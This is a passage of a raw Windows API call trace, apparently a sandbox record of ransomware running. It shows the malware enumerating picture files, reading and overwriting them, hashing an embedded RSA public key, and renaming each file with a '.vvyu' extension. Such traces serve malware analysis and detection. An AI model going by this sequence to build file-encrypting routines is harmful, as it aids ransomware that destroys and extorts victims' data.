lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.610] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0xfc31, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0xfc31, lpOverlapped=0x0) returned 1 [0193.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.611] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfc36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.611] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.612] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.612] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.612] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.613] CloseHandle (hObject=0x584) returned 1 [0193.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d49778 [0193.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.614] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\NLJO_aKDC.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\nljo_akdc.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\NLJO_aKDC.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\nljo_akdc.png.vvyu")) returned 1 [0193.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.616] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0193.618] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb4c5730, ftCreationTime.dwHighDateTime=0x1d8a472, ftLastAccessTime.dwLowDateTime=0x9f1d7170, ftLastAccessTime.dwHighDateTime=0x1d8a49c, ftLastWriteTime.dwLowDateTime=0x9f1d7170, ftLastWriteTime.dwHighDateTime=0x1d8a49c, nFileSizeHigh=0x0, nFileSizeLow=0x10e60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vzsbld-s6.bmp", cAlternateFileName="VZSBLD~1.BMP")) returned 1 [0193.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0193.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0193.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0193.619] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\vzsbld-s6.bmp") returned=".bmp" [0193.619] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\vzsbld-s6.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\vzsbld-s6.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.620] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=69216) returned 1 [0193.620] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.622] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10e3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.622] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.625] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.625] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x10e60, lpOverlapped=0x0) returned 1 [0193.626] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.626] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.626] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.626] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0193.627] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.627] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.627] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.627] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.627] GetLastError () returned 0x0 [0193.627] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.627] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0193.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.628] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.628] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.628] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e60) returned 0x2d49778 [0193.628] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d420b8 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42100 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.629] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f40 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39f28 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.633] GetCurrentThreadId () returned 0x264 [0193.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45dc0 [0193.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0193.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.634] GetCurrentThreadId () returned 0x264 [0193.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f28 [0193.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f40 [0193.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fa0 [0193.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fb8 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f58 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f28 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: 